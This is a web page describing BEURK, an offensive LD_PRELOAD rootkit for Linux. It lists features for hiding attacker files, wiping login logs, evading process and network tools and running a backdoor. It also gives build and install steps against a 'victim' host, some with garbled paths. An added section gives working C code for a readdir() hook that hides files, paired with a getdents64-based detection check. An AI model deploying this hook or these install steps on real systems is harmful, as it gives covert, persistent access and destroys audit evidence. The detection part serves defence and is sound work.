BEURK - Experimental Unix RootKit




BEURK is a userland preload rootkit for GNU/Linux, heavily focused on anti-debugging and anti-detection features, according to


  • Hide attacker files and directories
  • Realtime log cleanup (on utmp/wtmp)
  • Anti process and login detection
  • Bypass unhide, lsof, ps, ldd, netstat analysis
  • Furtive PTY backdoor client

Upcoming features

  • ptrace(2) hooking for anti-debugging
  • libpcap hooking to undermine local sniffers
  • PAM backdoor for local privilege escalation


  • Compile

git clone

cd beurk


  • Install

scp [email protected]:/lib/

ssh [email protected] 'echo /lib/ >> /etc/'

  • Done!

./ victim_ip:port # connect with furtive backdoor


The following packages are not required to build BEURK at the moment; they are only needed for the optional features noted next to each one:

  • libpcap – to avoid local sniffing
  • libpam – for local PAM backdoor
  • libssl – for encrypted backdoor connection

Example on Debian:

apt-get install libpcap-dev libpam-dev libssl-dev

Installing BEURK

su -

git clone git@github.com:unix-thrust/beurk.git

cd beurk

./build beurk.conf

mv /lib

echo "/lib/" > /etc/
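The feature list and the install steps above describe the two halves of a preload rootkit: a shared object whose functions shadow libc's for every dynamically linked program, and a single line in /etc/ld.so.preload that makes the loader pull it in. The following C program is an added illustration, not BEURK's own code (the page does not reproduce its source): a minimal readdir(3) hook that hides directory entries carrying an assumed marker prefix, placed next to the check a defender can run against it, which lists the same directory through the raw getdents64 syscall and diffs the two views. The prefix `bk_`, the scratch directory under /tmp and all function names are assumptions made for this demo.

```c
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

enum { NAME_LEN = 256, MAX_ENTRIES = 256 };   /* d_name: 255 bytes plus NUL */

/* Assumed marker: names starting with it are hidden. BEURK's real marker is
 * set in beurk.conf; "bk_" is a stand-in for this demo. */
static const char HIDE_PREFIX[] = "bk_";

int should_hide(const char *n) { return strncmp(n, HIDE_PREFIX, sizeof HIDE_PREFIX - 1) == 0; }

/* Attacker side: interposed readdir(3). Loaded via /etc/ld.so.preload (or linked
 * into the program, as here) this definition shadows libc's; it looks up the real
 * one with RTLD_NEXT and drops marked names, so ls, find and friends never see them. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (real_readdir == NULL)
        *(void **)&real_readdir = dlsym(RTLD_NEXT, "readdir");
    for (struct dirent *ent; (ent = real_readdir(dirp)) != NULL;)
        if (!should_hide(ent->d_name))
            return ent;
    return NULL;
}

/* Defender side: list a directory through the raw getdents64 syscall, which a
 * userland readdir hook cannot filter (glibc's struct dirent64 has the kernel's
 * linux_dirent64 layout). Returns the number of names in out[], or -1 on error. */
int raw_dir_names(const char *dir, char out[][NAME_LEN], int max)
{
    int fd = open(dir, O_RDONLY | O_DIRECTORY), n = 0;
    if (fd < 0)
        return -1;
    char buf[8192] __attribute__((aligned(8)));
    long got;
    while ((got = syscall(SYS_getdents64, fd, buf, sizeof buf)) > 0) {
        for (long pos = 0; pos < got && n < max;) {
            struct dirent64 *d = (struct dirent64 *)(buf + pos);
            snprintf(out[n++], NAME_LEN, "%s", d->d_name);
            pos += d->d_reclen;
        }
    }
    close(fd);
    return n;
}

/* Names the kernel reports that a readdir() loop does not: the hidden ones. */
int hidden_from_readdir(const char *dir, char out[][NAME_LEN], int max)
{
    char raw[MAX_ENTRIES][NAME_LEN], seen[MAX_ENTRIES][NAME_LEN];
    int nraw = raw_dir_names(dir, raw, MAX_ENTRIES), nseen = 0, nhidden = 0;
    DIR *dp = nraw < 0 ? NULL : opendir(dir);
    if (dp == NULL)
        return -1;
    for (struct dirent *e; nseen < MAX_ENTRIES && (e = readdir(dp)) != NULL;)
        snprintf(seen[nseen++], NAME_LEN, "%s", e->d_name);   /* hooked path */
    closedir(dp);
    for (int i = 0; i < nraw; i++) {
        int found = 0;
        for (int j = 0; j < nseen && !found; j++)
            found = strcmp(raw[i], seen[j]) == 0;
        if (!found && nhidden < max)
            snprintf(out[nhidden++], NAME_LEN, "%s", raw[i]);
    }
    return nhidden;
}

/* Constructed scratch directory with one plain and one marked file. Returns 1
 * when readdir() hides exactly the marked file while getdents64 still reports it. */
int demo_hidden_file(void)
{
    char dir[] = "/tmp/preload_demo_XXXXXX", plain[320], marked[320], found[8][NAME_LEN];
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(plain, sizeof plain, "%s/notes.txt", dir);
    snprintf(marked, sizeof marked, "%s/%ssecret", dir, HIDE_PREFIX);
    close(open(plain, O_WRONLY | O_CREAT, 0600));
    close(open(marked, O_WRONLY | O_CREAT, 0600));
    int n = hidden_from_readdir(dir, found, 8);
    int ok = n == 1 && strcmp(found[0], "bk_secret") == 0;
    unlink(plain); unlink(marked); rmdir(dir);
    return ok;
}

int main(void)
{
    printf("marked file hidden from readdir but seen by getdents64: %s\n",
           demo_hidden_file() ? "yes" : "no");
    return 0;
}
```

Built as a normal executable (`cc demo.c`, adding `-ldl` on glibc older than 2.34) the hook is linked in and the program reports that the marked file is missing from readdir() yet present in the raw listing. Built with `-shared -fPIC` and its path appended to /etc/ld.so.preload, as in the install steps above, the same readdir() wins in every dynamically linked program on the host. Two caveats for the check: a rootkit that also interposes syscall() defeats it from inside a dynamic binary, and the loader does not apply ld.so.preload to statically linked programs, so a static busybox (or a static build of this checker) is the version to run when the box is suspect.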
